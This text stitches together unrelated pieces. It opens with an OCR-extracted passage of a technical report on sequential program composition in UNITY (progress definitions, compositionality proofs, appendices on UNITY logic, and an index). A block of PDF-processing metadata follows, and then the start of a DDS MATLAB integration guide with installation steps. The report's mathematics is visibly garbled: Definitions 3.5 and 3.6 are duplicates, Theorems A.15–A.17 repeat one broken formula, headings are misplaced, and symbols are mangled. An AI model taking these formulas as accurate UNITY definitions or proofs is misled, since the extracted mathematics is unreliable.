\text{init } \text{some initial condition} & \quad \text{init } (x = 9) \\
\text{assign } x := 10 & \quad \text{assign } x := 10
\end{align*}
\]
Moreover, for the sake of the argument suppose that the answer to the previous question would be yes, and we define:
\[ J \uparrow \vdash p \gg \rightarrow q = \forall pc\ n\ U : \{pc\} \mathrel{\triangleleft} U^+ \land U = \text{semantics}.U^+.pc.n.q \land \exists U^+ : J \uparrow p \rightarrow q \]
Therefore, we are able to prove that:
\[ J \; n_{(x = 9)} \downarrow \vdash \text{some initial condition} \rightarrow (x = 10) \]
However, since the \( x \) will never be 9, the \( pc \) in the semantics of \( P \; n_{(x = 9)} \) \( Q \) will never be incremented, and consequently, we cannot prove that
\[ J \; n_{(x = 9)} \downarrow \vdash \text{some initial condition} \rightarrow something\ beautiful \]
since, \( H \) will never get a chance to execute. Thus, defining \( \rightarrow \) in this way does not enable us to prove the theorems we are aiming at, and the answer to the question posed above is no. From this discussion we can derive that we only want \( J \; n\downarrow p \gg \rightarrow q \) to be valid if, \( q \) eventually holds during the execution of the last program in the \( \uparrow \)-sequence \( U^+ \). This can be established by letting \( q \) be the exit condition of the last program in the \( \uparrow \)-sequence \( U^+ \), and requiring that the value of the \( pc \) in the semantics of this sequence eventually reaches its maximum value. Consequently, progress properties for UNITY\(^+ \) programs are defined as follows:
**Definition 3.5**
\[ J \; n\downarrow p \gg \rightarrow q = \forall pc\ n\ m\ U : \{pc\} \mathrel{\triangleleft} U^+ \land U = \text{semantics}.U^+.pc.n.q \land m = \max pc.U^+.pc.n : J \; n\downarrow (p \land (pc = n)) \rightarrow (pc = m) \]
**Definition 3.6**
\[ J \; n\downarrow p \gg \rightarrow q = \forall pc\ n\ m\ U : \{pc\} \mathrel{\triangleleft} U^+ \land U = \text{semantics}.U^+.pc.n.q \land m = \max pc.U^+.pc.n : J \; n\downarrow (p \land (pc = n)) \rightarrow (pc = m) \]
Compositionality theorems for \( \gg \), are presented below. For \( \gg \) similar properties hold.
4 Concluding remarks
In this technical report we have presented a formalisation of sequential program composition in UNITY. We have been brief and have not described any application of the developed theory in detail. We think we have obtained a nice formalisation of the semantics of ‑. Once the transformation function (tr) was defined, the definitions of the safety and progress operators followed naturally, and the compositionality results were proved smoothly. Moreover, we find that the formalisation illustrates the possibly unexpected complications that can appear when formally defining allegedly simple concepts (like ‑) of which the definition and properties are intuitively clear.
References
Theorem 3.7
\[ J_{p \vdash} p \rightarrow q \land (\forall pc : \{pc\} \leq (\text{Simple}.P) : J_{C pc^c}) \]
\[ J_{\text{Simple}.P \vdash} p \rightarrow q \]
Theorem 3.8
\[ q^C w^{P^+} \land J_{p \vdash} p \rightarrow^+ q \land J_{q \vdash} q \rightarrow^+ s \]
\[ J_{p \vdash q \rightarrow^+ s \vdash} p \rightarrow^+ s \]
Appendices
A UNITY
In this section we shall give an overview of the UNITY theory and Prasetya’s extensions. We shall concentrate on those concepts that are needed in the rest of this report. For a more thorough treatment the reader is referred to [CM89, Pra95, Vos00].
A.1 Variables, values, states, expressions and actions
The state of a program is represented as a function from a universe $\var$ of all program variables to a universe $\val$ of all values these variables may take. The set of all program states will be denoted by $\State$.
A state-expression is a function of type $\State \rightarrow \alpha$, where $\alpha$ is an arbitrary type. The set of all state-expressions will be denoted by $\Expr$.
A state-predicate is a state-expression where type $\alpha$ is $\bool$.
A state-expression $f$ is confined by a set of variables $V$, denoted by $f \mathcal{C} V$, if $f$ does not restrict the value of any variable outside $V$:
Definition A.1 STATE-EXPRESSION CONFINEMENT \[ CONF.DEF \]
For all $f \in (\sigma_1 \rightarrow \sigma_2) \rightarrow \alpha$, and $V \subseteq \sigma_1$,
\[
\begin{align*}
f \mathcal{C} V &= (\forall s, t :: (s \upharpoonright V = t \upharpoonright V) \implies (f.s = f.t))
\end{align*}
\]
The confinement operator is monotonic in its second argument.
Theorem A.2 \[ CONF.MONO \]
$V \subseteq W \land (f \mathcal{C} V) \implies (f \mathcal{C} W)$
The actions of a UNITY program can be multiple assignments or guarded multiple assignments. The universe of actions will be denoted by $\act$.
A set of variables is $V$ ignored-by an action $A$, denoted by $V \leftarrow A$, if executing $A$’s executable in any state does not change the values of these variables. Variables in $V \subseteq \var$ may however be written by $A$.
A.2 UNITY programs
A UNITY program consists of declarations of read variables, write variables, a specification of their initial values, and a set of actions.
An execution of a UNITY program starts in a state satisfying the initial condition and is an infinite and interleaved execution of its actions. In each step of the execution some action is selected and executed atomically. The selection of actions is weakly fair, i.e. non-deterministic selection constrained by the following fairness rule:
\[
\text{Each action is scheduled for execution infinitely often, and hence cannot be ignored forever.}
\]
A UNITY program $P$ is modelled by a quadruple $(A, J, V_r, V_w)$ where $A \subseteq \act$ is a set consisting of $P$’s actions, $J \in \Expr$ is a state-predicate describing the possible initial states of $P$, and $V_r, V_w \subseteq \var$ are sets containing $P$’s read and write variables respectively. The set of all possible quadruples $(A, J, V_r, V_w)$ shall be denoted by $\prog$. To access each component of
A.3 UNITY specification and proof logic
such an $\text{Uprog}$ object, the destructors $a$, $\text{ini}$, $r$, and $w$ are introduced. They satisfy the following property:
Theorem A.3 $\text{Uprog}$ Destructors
$$P \in \text{Uprog} = (P = (aP, \text{ini}P, rP, wP))$$
The operators on actions can now be lifted to the program level as follows:
Definition A.4 VARIABLES IGNORED-BY Program $\text{dIG}_\text{BY}_\text{Pr}$
$$V \leftarrow P \equiv \forall a : a \in aP : V \leftarrow a$$
Due to the absence of ordering in the execution of a UNITY program, parallel composition of two programs can be modelled by simply merging the variables and actions of both programs. In UNITY parallel composition is denoted by $[]$. In [CM89] the operator is also called program union.
Definition A.5 PARALLEL COMPOSITION $\text{dPAR}$
$$P [] Q = (aP \cup aQ, \text{ini}P \land \text{ini}Q, rP \cup rQ, wP \cup wQ)$$
Parallel composition is reflexive, commutative, associative, and has the identity element ($\emptyset$, true, $\emptyset$, $\emptyset$). We can strengthen the initial condition of a UNITY program using the following function:
Definition A.6 STRENGTHEN THE initial condition $\text{add}_\text{to}_\text{initial}_\text{cond}$
$$\text{add}_\text{to}_\text{initial}_\text{cond}.I.P = (aP, \text{ini}P \land I, rP, wP)$$
A.3 UNITY specification and proof logic
UNITY logic is used to specify the correctness expectations or properties of a UNITY program. UNITY specifications, and program properties are built from state-predicates and relations on them. Traditionally, two kinds of program properties are distinguished:
- Safety properties stating that some undesirable behaviour does not occur;
- Progress properties stating that some desirable behaviour is eventually realised.
Consequently, the UNITY logic contains two basic relations on state-predicates corresponding to these properties. For a UNITY program $P$ and state-predicates $p, q \in \text{Expr}$, these are defined by:
Definition A.7 UNLESS (Safety Property) $\text{UNLESS}_e$
$$\rho^P \text{ unless } q = (\forall a : a \in aP : \{p \land \neg q\} \land \{p \lor q\})$$
Definition A.8 ENSURES (Progress Property) $\text{ENSURES}_e$
$$\rho^P \text{ ensures } q = (\rho^P \text{ unless } q) \land (\exists a : a \in aP : \{p \land \neg q\} \land \{q\})$$
Safety properties are described by the unless relation (definition A.7). Intuitively, $\rho^P \text{ unless } q$ implies that once $p$ holds during an execution of $P$, it remains to hold at least until $q$ holds. Note that this interpretation gives no information whatsoever about what $p \text{ unless } q$ means if $p$ never holds during an execution.
Progress properties are described by the ensures relation. As can be seen from Definition A.8, \( r \vdash p \text{ ensures } q \) encompasses \( p \) unless \( q \). Furthermore, it ensures that there exists an action that can – and, as a result of the weakly fair execution of UNITY programs, will – establish \( q \).
A state-predicate \( p \) is a stable predicate in program \( P \), if, once \( p \) holds during any execution of \( P \), it will remain to hold forever.
**Definition A.9 Stable Predicate**
\[ \rho \vdash \circ p = \rho \vdash p \text{ unless false} \]
A state-predicate \( p \) is a fixed-point of program \( P \), if, once predicate \( p \) holds during the execution of \( P \), the program can no longer make any progress. In other words, once \( p \) holds during the execution of \( P \), the program will subsequently behave as skip. If \( p \) is a fixed point of program \( P \) we denote this by \( \rho \vdash FP.p \).
To specify general progress properties in UNITY, the leads-to operator is used. It is denoted by \( \mapsto \), and defined as the smallest transitive and disjunctive closure of ensures. The precise definition and properties of \( \mapsto \) can be found in [CM89]. In this technical report, we shall use Prasetya’s [Pra95] variant of \( \mapsto \) to specify progress properties. Prasetya’s operator, called reach, is denoted by \( \mapsto \), and is defined (without overloading) as follows:
**Definition A.10 Reach Operator**
\[(\lambda p, q. J P \vdash p \mapsto q) \text{ is defined as the smallest relation } R \text{ satisfying:}\]
\[
\begin{align*}
(i). & \quad p \bar{C} wP \land q \bar{C} wP \land (\rho \vdash \circ J) \land (\rho \vdash J \land p \text{ ensures } q) \\
(ii). & \quad R.p.q \land R.q.r \\
(iii). & \quad (\forall i : \text{evalb}(W.i : p_i).q) \quad R.(\forall i : W.i : p_i).q
\end{align*}
\]
where \( W \) characterises a non-empty set.
Intuitively, \( J \rho \vdash p \mapsto q \) means that \( J \) is a stable predicate in \( P \) and that \( P \) can progress from \( J \land p \) to \( q \). Note that:
- \( p \mapsto q \) describes progress made through the writable part of program \( P \) (viz. \( p \) and \( q \) are confined by the write variables of \( P \)). However, since a program can only make progress on its write variables, this should not be a hindrance [Pra95].
- the predicate \( J \) can be used to specify the non-writable part of the program, e.g. assumptions on the environment in which the program operates.
Some properties of the UNITY operators can be found in Figure 4.
In [Pra95], Prasetya also introduces an operator to specify the more restricted form of self-stabilisation, called convergence, that allows a program to recover only from certain failures. The convergence operator is denoted by \( \rightsquigarrow \) and defined in terms of \( \mapsto \) as follows:
**Definition A.18 Convergence**
\[ J \rho \vdash p \rightsquigarrow q \triangleq q \bar{C} wP \land (\exists q' :: (J \rho \vdash p \mapsto q' \land q) \land (\rho \vdash \circ (J \land q' \land q'))) \]
A program \( P \) converges from \( p \) to \( q \) under the stability of \( J \) (i.e. \( J \rho \vdash p \rightsquigarrow q \)), if, given that \( \rho \vdash \circ J \), the program \( P \) started in \( p \) will eventually find itself in a situation where \( q \) holds and will remain to hold. Intuitively, a program \( P \) for which this holds can recover from failures which
A.4 Restricted union superposition
Theorem A.11 \textit{unless Compositionality}
\[(\rho \vdash p \text{ unless } q) \land (\sigma \vdash p \text{ unless } q) = (\rho \cap \sigma \vdash p \text{ unless } q)\]
Theorem A.12
\[(V \neq P) \land (p \mathcal{C} V)\]
Theorem A.13 \textit{\implies Introduction}
\[P, J : (p \implies q) \land (q \implies r)\]
Theorem A.14 \textit{\implies Transitivity}
\[J, P_1 \vdash q \land P_2 \vdash \not{r}\]
Theorem A.15 \textit{\implies Par Skip Imp Reach}
\[J, P_1 \vdash q \land P_2 \vdash \not{r}\]
Theorem A.16 \textit{\implies Par Skip Imp Reach}
\[J, P_1 \vdash q \land P_2 \vdash \not{r}\]
Theorem A.17 \textit{\implies Par Skip Imp Reach}
\[J, P_1 \vdash q \land P_2 \vdash \not{r}\]
\[\text{Figure 4: Some properties of the UNITY operators.}\]
Most properties of \(\implies\) are analogous to those of \(\implies\). Since, in this technical report, we do not need these theorems directly, the reader is referred to [Pra95] for their exact characterisation.
A.4 Restricted union superposition
In [CM89], the \textit{restricted union superposition} rule states that an action \(A\) may be added to an underlying program provided that \(A\) does not assign to the underlying variables. Here we split this into two parts: (1) defining the actual transformation of the program; (2) proving under which conditions this transformation preserves the properties of the underlying program.
Let \(A\) be an action from the universe \textit{ACTION}, and let \(iA\) be a state-predicate describing the initial values of the superposed variables, then a program \(P\) can be refined by restricted union superposition using the transformation formally defined by:
\textbf{Definition A.21 Restricted union superposition}
\[\text{RU superpose DEF}\]
Let \(A \in \text{ACTION}, iA \in \text{Expr}, \text{ and } P \in \text{Uprog.}\]
\[\text{RU.S.P.A.iA} = P \parallel (\{A\}, iA, \text{assignvars}A, \text{assignvars}A)\]
Let $P \in \text{Uprog}$, $A \in \text{ACTION}$, and $p, q, J \in \text{Expr}$.
**Theorem A.19**
**Preservation of** unless **AND** ensures
\[
\begin{align*}
\text{RU}_\text{Superpose} & \text{ PRESERVES UNLESS} \\
\text{RU}_\text{Superpose} & \text{ PRESERVES ENSURES}
\end{align*}
\]
\[
\begin{align*}
p \not\rightarrow C w P \land q \not\rightarrow C w P \land w P & \not\leftrightarrow A \\
(\text{RU}_\text{Superpose} \text{ PRESERVES UNLESS}) \\
(\text{RU}_\text{Superpose} \text{ PRESERVES ENSURES})
\end{align*}
\]
**Theorem A.20**
**Preservation of** $\rightarrow$ **AND** $\twoheadrightarrow$
\[
\begin{align*}
\text{RU}_\text{Superpose} & \text{ PRESERVES REACH} \\
\text{RU}_\text{Superpose} & \text{ PRESERVES CON}
\end{align*}
\]
\[
\begin{align*}
J \not\rightarrow C w P \land w P & \not\leftrightarrow A \\
(J \not\rightarrow C w P \land w P & \not\leftrightarrow A)
\end{align*}
\]
**Theorem A.22**
**Strengthen Guard Symmetry**
\[
\begin{align*}
\text{strengthen} & \text{ guards}(g_1 \land g_2).P = \text{strengthen} \text{ guards}.g_1.(\text{strengthen} \text{ guards}.g_2.P)
\end{align*}
\]
**Theorem A.23**
**Preservation of** $\rightarrow$
\[
\begin{align*}
\text{strengthen} \text{ Pr} & \text{ guards} \text{ PRESERVES REACH}
\end{align*}
\]
\[
\begin{align*}
g \not\rightarrow C w P \land (\neg q \Rightarrow g) & \not\rightarrow J \\
(\text{RU}_\text{Superpose} \text{ PRESERVES REACH})
\end{align*}
\]
**Theorem A.24**
**Strengthen Pr guards with STABLE PRESERVES REACH**
\[
\begin{align*}
g \not\rightarrow C w P \land h & \not\rightarrow g \\
(\text{RU}_\text{Superpose} \text{ PRESERVES REACH})
\end{align*}
\]
**Figure 5:** Restricted Union Superposition preserves properties
**Figure 6:** Properties of strengthening program guards
Where the function \text{assign} \text{ vars}, given an action $A$, returns the set of variables that are assigned by this action. Theorems stating that properties are preserved under restricted union superposition are listed in Figure 5. Note that instead of requiring that the superposed action $A$ does not write to the underlying variables, it is sufficient to require that the write variables of the underlying program are ignored by the action $A$.
### A.5 Strengthening guards
Another program transformation that preserves safety properties and, under some conditions, progress properties of the underlying program is that of strengthening guards [Sin89b, Mis90a]. Below, we define the transformation for the case where all guards of the program are strengthened with the same guard.
Some properties of this transformation are listed in Figure 6 below.
B Proofs of the \( \diamond \)-compositionality theorems
In this section we shall briefly discuss the verification of the compositionality theorems. Theorems 3.3 in Figure 3 can be proved using Restricted Union unless Preservation A.19. Theorems 3.4 in Figure 3 can be proved using unless Compositionality A.11. The verification of the theorems 3.7 and 3.8 will be described in the sections below.
B.1 Proof of Theorem 3.7
Assume the following:
\( \text{A}_1: J^p \vdash p \rightarrow q \)
\( \text{A}_2: \forall pc: \{ pc \} \not\subseteq (\text{Simple}.P): J^c pc^c \)
we have to prove that: \( J_{\text{Simple}}^p \vdash p \rightarrow q \).
using Definition 3.5 this comes down to proving that:
\( \forall pc \ n \ m \ U: \{ pc \} \not\subseteq (\text{Simple}.P) \)
\( \land U = \text{semantics}.(\text{Simple}.P).pc.n.q \)
\( \land m = \text{max}.pc.(\text{Simple}.P).pc.n \)
\( \Rightarrow \)
\( J^p \vdash (p \land (pc = n)) \rightarrow (pc = m) \)
Assuming:
\( \text{A}_3: \{ pc \} \not\subseteq (\text{Simple}.P) \)
\( \text{A}_4: U = \text{semantics}.(\text{Simple}.P).pc.n.q \)
\( \text{A}_5: m = \text{max}.pc.(\text{Simple}.P).pc.n \)
we have to prove that: \( J^p \vdash (p \land (pc = n)) \rightarrow (pc = m) \)
rewriting \( \text{A}_4 \) with Definitions A.21, 2.3 and 2.4 we can deduce:
\( \text{A}_6: U = U_P \uplus U_{pc} \), such that
\( \text{A}_7: U_P = \text{strengthen_guards}.(pc = n \land \neg q).aP.\text{init}P \land (pc = n), wP \cup \{ pc \}, rP \cup \{ pc \}) \)
\( \text{A}_8: U_{pc} = (\text{if } (pc = n \land q) \text{ then } pc := pc + 1, (pc = n), \{ pc \}) \)
\( \text{A}_9: m = (n + 1) \)
Now we have to prove that: $J_{v_p} \vdash v_{pc} \vdash (p \land pc = n) \Rightarrow pc = (n + 1)$
$\Leftarrow (\Rightarrow \text{Transitivity} \ (\text{A.14}_{13}))$
$J_{v_p} \cup v_{pc} \vdash (p \land pc = n) \Rightarrow (q \land pc = n)$
$J_{v_p} \cup v_{pc} \vdash (q \land pc = n) \Rightarrow pc = (n + 1)$
The second conjunct can be proved by $\Rightarrow \text{Introduction} \ (\text{A.13}_{13})$, since $U_{pc}$ (from $\text{A}_8$) ensures the required progress.
The first conjunct is decomposed as follows:
$\Leftarrow (\text{Theorem A.15}_{13})$
$J_{v_p} \vdash (p \land pc = n) \Rightarrow (q \land pc = n)$
$\land$
$v_{pc} \vdash \text{FP} \ (\neg (q \land pc = n))$
$\land$
$v_{pc} \vdash \circ J$
Since the guard of the only action of program $U_{pc}$ (from $\text{A}_8$) is $(pc = n \land q)$, it is not hard to see that $\neg (q \land pc = n)$ is a fixed point of $U_{pc}$.
Using assumptions $\text{A}_2$ and $\text{A}_3$, we can infer that $J$ does not depend on the variable $pc$ (i.e. $J \notin \{pc\}^\circ$). Moreover, since $U_{pc}$ only writes to the variable $pc$ it is straightforward to prove that $U_{pc}$ ignores all other variables (i.e. $\{pc\}^\delta \subseteq U_{pc}$). Consequently, we can use Theorem A.12$_{13}$ to prove that $J$ is stable in $U_{pc}$.
Consequently, we are left with the proof obligation: $J_{v_p} \vdash (p \land pc = n) \Rightarrow (q \land pc = n)$
Using A.22$_{14}$, we can rewrite assumption $\text{A}_7$ into
$U_p = \text{strengthen guards}. (pc = n), U'_p$, where
$U'_p = \text{strengthen guards}. (\neg q), (aP, iniP \land (pc = n), wP \cup \{pc\}, rP \cup \{pc\})$
now we proceed as follows:
$J_{v_p} \vdash (p \land pc = n) \Rightarrow (q \land pc = n)$
$\Leftarrow (\text{Theorem Strengthen guards with stable predicate A.24}_{14})$
$J_{v'_p} \vdash p \Rightarrow q$
$\land$
$(pc = n) \circ wU'_p$
$\land$
$v'_p \vdash \circ (pc = n)$
Because adding variables and initial conditions to a program trivially preserves its progress properties, Theorem $\text{strengthen guards}$ preservation of $\Rightarrow (\text{A.23}_{14})$ and assumption $\text{A}_1$ can be used to establish the first conjunct. Since $\{pc\} \subseteq wU'_p$, Theorem $\text{C Monotonicity A.2}_{10}$ proves the second conjunct. Finally, Theorem A.12$_{13}$ and assumption $\text{A}_3$ proves the last conjunct.
B.2 Proof of Theorem 3.8
Assume the following:
A₁: \( q \uparrow \overline{1} \uparrow p \)
A₂: \( J \uparrow p \implies q \)
A₃: \( J \uparrow q \implies s \)
we have to prove that: \( J \uparrow rv_q \uparrow p \implies s \).
Using Definition 3.5 this comes down to proving that:
\[
\forall pc \ n \ m \ U : \ {pc} \models (P \uparrow q) \wedge U = \text{semantics}(P \uparrow q), pc.n.s \wedge m = \text{max}_pc.(P \uparrow q), pc.n \implies J \uparrow pc \ (p \land (pc = n)) \implies (pc = m)
\]
Assuming:
A₄: \( \{pc\} \models (P \uparrow q) \)
A₅: \( U = \text{semantics}(P \uparrow q), pc.n.s \)
A₆: \( m = \text{max}_pc.(P \uparrow q), pc.n \)
using Definitions 2.3 and 2.4 we can deduce that there exist \( U_P, U_Q, m, \) and \( k \), for which:
A₇: \( U_P = \text{semantics}.P.pc.n.q \)
A₈: \( k = \text{max}_pc.P.pc.n \)
A₉: \( U_Q = \text{semantics}.Q.pc.m.s \)
A₁₀: \( m = \text{max}_pc.Q.pc.k \)
such that:
A₁₁: \( U = U_P \parallel U_Q \)
Now we have to prove that: \( J \uparrow rv_p \uparrow v_q \uparrow (p \land pc = n) \implies pc = k \)
Using \( \implies \text{TRANSITIVITY} \) this proof obligation can be decomposed into two proof obligations stating the progress that is established by \( U_P \), and the progress that is established by \( U_Q \), as follows:
\[
\equiv(\implies \text{TRANSITIVITY} \ (A.14_{13}))
\]
\[
J \uparrow rv_p \uparrow v_q \uparrow (p \land pc = n) \implies (q \land pc = m)
\]
\wedge
B.2 Proof of Theorem 3.8
\[ J_{v_p \parallel v_q} \vdash (q \land pc = m) \rightarrow pc = k \]
These two conjunct are proved using Theorem A.16_{13} (take \( r = (pc < m) \)) and Theorem A.17_{13} (take \( r = (pc \geq m) \)) respectively. Using Theorems 2.8_{6}, 2.10_{6}, 2.9_{6}, and 2.11_{6}, these proofs are straightforward.
Index
⇝ (convergence operator), 12
↢ (ignored-by operator (actions)), 9
⇣ (ignored-by operator (programs)), 11
∥ (parallel composition operator), 11
sẻ (sequential program composition), 1, 3
⇝ (reach operator), 12
↢ (reach operator), 12
⟳ (stability operator), 12
⟳+ , 7
⟳, 7
⟳, 5
⟳, 9
a (UNITY program destructor), 11
actions
atomic, 10
add_to_initial_cond, 11
composition of
UNITY programs
parallel, 1, 11
compositionality results, 1
confinement, 10
convergence (⇝)
definition, 12
ensures (progress operator)
definition, 11
execution of a UNITY program, 10
Expr (universe of state-expressions), 10
expression
state-, 10
fairness (UNITY), 10
fixed-point, 12
FP.p, 12
fresh variable, 5
guard strengthening
of programs, 14
ignored-by operator
actions (↤), 10
programs (↭), 11
ini (UNITY program destructor), 11
parallel composition (∥)
definition, 11
modelling of, 11
properties, 11
predicate, 10, see state-predicate
program
union, see parallel composition
progress property, 11
⇝ (leadsto operator), 12
↣ (reach operator), 12
⟳+, 9
⟳, 9
ensures, 11
r (UNITY program destructor), 11
reach operator (⇝)
definition, 12
properties
compositionality, 13
refinement
of programs
strengthening guards, 14
restricted union superposition, 13
definition, 14
properties
preservation of ⇝, 14
preservation of ensures, 14
preservation of ⇣, 14
RU.S (restricted union superposition operator), 14
definition, 14
properties
preservation of ⇝, 14
preservation of ensures, 14
preservation of ⇣, 14
safety property, 11
⟳, 12
⟳+, 7
unless+, 7
unless, 11
sequential program composition (⟨⟩)
intuitive definition, 1
properties, 5, 7, 8
semantics, 4
SND (HOL constant (‘a#’b)→’b), 5
stability operator (⟳), 12
definition, 12
stable predicate, 12, see also stability operator
State (state-space), 10
state
represented as function, 10
INDEX
state space, 10
state-function
confinement, 10
state-predicate, 10, see also state-function
stable, 12
strengthening guards, 14
strengthen guards (of a program), 15
definition, 15
properties
preservation of $\rightarrow$, 14
symmetry, 14
superposition refinement
restricted union, 13
definition, 14
properties, 14
UNITY
fairness, 10
parallel composition $([\cdot])$, 11
definition, 11
modelling of, 11
properties, 11
program, 10
proof logic, 11
sequential program composition ($\succeq$)
intuitive definition, 1
properties, 5, 7, 8
semantics, 4
specification, 11
specification logic, 11
UNITY program, 10
destructors
a, 11
in, 11
r, 11
w, 11
execution of a, 10
fairness, 10
modelled as a quadruple, 10
parallel composition $([\cdot])$, 11
definition, 11
modelling of, 11
properties, 11
refinement
restricted union superposition, 13
strengthening guards, 14
sequential composition ($\succeq$)
intuitive definition, 1
properties, 5, 7, 8
semantics, 4
union, see parallel composition
variables ignored by, 11
UNITY$^+$ program, 3
abstract syntax, 3
properties, 5–8
semantics, 4
variables ignored by, 5
write variables of, 3
universe of
actions (ACTION), 10
program variables (Var), 10
state-expression (Expr), 10
UNITY programs ($\mathbb{U}_\text{prog}$), 10
unless (safety operator)
definition, 11
unless$^+$ (safety operator)
definition, 7
properties, 7
$\mathbb{U}_\text{prog}$ (universe of UNITY programs), 10
Val (value-space), 10
Var (universe of variables), 10
variable
ignored, 10
weak fairness, 10
w (UNITY program destructor), 11
|
{"Source-Url": "http://www.staff.science.uu.nl/~swier101/Papers/2000/2000-10.pdf", "len_cl100k_base": 13923, "olmocr-version": "0.1.53", "pdf-total-pages": 20, "total-fallback-pages": 0, "total-input-tokens": 79563, "total-output-tokens": 16028, "length": "2e13", "weborganizer": {"__label__adult": 0.0003402233123779297, "__label__art_design": 0.0004405975341796875, "__label__crime_law": 0.00045013427734375, "__label__education_jobs": 0.0009832382202148438, "__label__entertainment": 7.033348083496094e-05, "__label__fashion_beauty": 0.00016355514526367188, "__label__finance_business": 0.0003230571746826172, "__label__food_dining": 0.0003812313079833984, "__label__games": 0.0008325576782226562, "__label__hardware": 0.0010995864868164062, "__label__health": 0.0006031990051269531, "__label__history": 0.000274658203125, "__label__home_hobbies": 0.00016701221466064453, "__label__industrial": 0.000576019287109375, "__label__literature": 0.0003407001495361328, "__label__politics": 0.00032830238342285156, "__label__religion": 0.0005469322204589844, "__label__science_tech": 0.0555419921875, "__label__social_life": 9.500980377197266e-05, "__label__software": 0.006671905517578125, "__label__software_dev": 0.9287109375, "__label__sports_fitness": 0.0002815723419189453, "__label__transportation": 0.0006594657897949219, "__label__travel": 0.00019800662994384768}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 46437, 0.04038]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 46437, 0.64775]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 46437, 0.78583]], "google_gemma-3-12b-it_contains_pii": [[0, 3222, false], [3222, 6874, null], [6874, 9390, null], [9390, 12556, null], [12556, 14326, null], [14326, 16947, null], [16947, 19061, null], [19061, 21572, null], [21572, 23638, null], [23638, 26453, null], [26453, 29147, null], [29147, 32637, null], [32637, 34607, null], [34607, 37193, null], [37193, 38903, null], [38903, 41276, null], [41276, 42736, null], [42736, 43070, null], [43070, 44893, null], [44893, 46437, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3222, true], [3222, 6874, null], [6874, 9390, null], [9390, 12556, null], [12556, 14326, null], [14326, 16947, null], [16947, 19061, null], [19061, 21572, null], [21572, 23638, null], [23638, 26453, null], [26453, 29147, null], [29147, 32637, null], [32637, 34607, null], [34607, 37193, null], [37193, 38903, null], [38903, 41276, null], [41276, 42736, null], [42736, 43070, null], [43070, 44893, null], [44893, 46437, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 46437, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 46437, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 46437, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 46437, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 46437, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 46437, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 46437, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 46437, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 46437, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 46437, null]], "pdf_page_numbers": [[0, 3222, 1], [3222, 6874, 2], [6874, 9390, 3], [9390, 12556, 4], [12556, 14326, 5], [14326, 16947, 6], [16947, 19061, 7], [19061, 21572, 8], [21572, 23638, 9], [23638, 26453, 10], [26453, 29147, 11], [29147, 32637, 12], [32637, 34607, 13], [34607, 37193, 14], [37193, 38903, 15], [38903, 41276, 16], [41276, 42736, 17], [42736, 43070, 18], [43070, 44893, 19], [44893, 46437, 20]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 46437, 0.02241]]}
|
olmocr_science_pdfs
|
2024-12-05
|
2024-12-05
|
b31cd6d49cf28bbde89a9edd73fb9d3b7f44aab9
|
DDS MATLAB Guide
Release 6.x
Introduction
The DDS MATLAB Integration provides users with DDS MATLAB classes to model DDS communication using MATLAB and pure DDS applications.
Please refer to the DDS and MATLAB documentation for detailed information.
1.1 DDS
What is DDS?
“The Data Distribution Service (DDS™) is a middleware protocol and API standard for data-centric connectivity from the Object Management Group® (OMG®). It integrates the components of a system together, providing low-latency data connectivity, extreme reliability, and a scalable architecture that business and mission-critical Internet of Things (IoT) applications need.”
“The main goal of DDS is to share the right data at the right place at the right time, even between time-decoupled publishers and consumers. DDS implements global data space by carefully replicating relevant portions of the logically shared dataspace.” DDS specification
Further Documentation
http://portals.omg.org/dds/
http://ist.adlinktech.com/
1.2 MATLAB
What is MATLAB?
“The Language of Technical Computing
Millions of engineers and scientists worldwide use MATLAB® to analyze and design the systems and products transforming our world. MATLAB is in automobile active safety systems, interplanetary spacecraft, health monitoring devices, smart power grids, and LTE cellular networks. It is used for machine learning, signal processing, image processing, computer vision, communications, computational finance, control design, robotics, and much more.
The MATLAB platform is optimized for solving engineering and scientific problems. The matrix-based MATLAB language is the world’s most natural way to express computational mathematics. Built-in graphics make it easy to visualize and gain insights from data. A vast library of prebuilt toolboxes lets you get started right away with algorithms essential to your domain. The desktop environment invites experimentation, exploration, and discovery. These MATLAB tools and capabilities are all rigorously tested and designed to work together.
Scale. Integrate. Deploy.
MATLAB helps you take your ideas beyond the desktop. You can run your analyses on larger data sets and scale up to clusters and clouds. MATLAB code can be integrated with other languages, enabling you to deploy algorithms and applications within web, enterprise, and production systems.”
https://www.mathworks.com/products/matlab.html
This section describes the procedure to install the Vortex DDS MATLAB Integration on a Linux or Windows platform.
2.1 System Requirements
- Operating System: Windows or Linux
- MATLAB installed
- Java 1.7 or greater
2.2 OpenSplice (OSPL) and DDS MATLAB Installation
Steps:
1. Install OSPL. The DDS MATLAB Integration is included in this installer.
2. Setup OSPL license. Copy the license.lic file into the appropriate license directory.
/INSTALLDIR/Vortex_v2/license
3. DDS MATLAB files are contained in a tools/matlab folder
Example: /INSTALLDIR/Vortex_v2/Device/VortexOpenSplice/6.8.1/HDE/x86_64.linux/tools/matlab
2.3 MATLAB and DDS Setup
Steps:
1. Open command shell and run script to setup environment variables.
**Linux**
- Open a Linux terminal.
- Navigate to directory containing release.com file.
/INSTALLDIR/Vortex_v2/Device/VortexOpenSplice/6.8.1/HDE/x86_64.linux
- Run release.com. (Type in “. release.com” at command line.)
**Windows**
- Open a command prompt.
- Navigate to directory containing release.bat file.
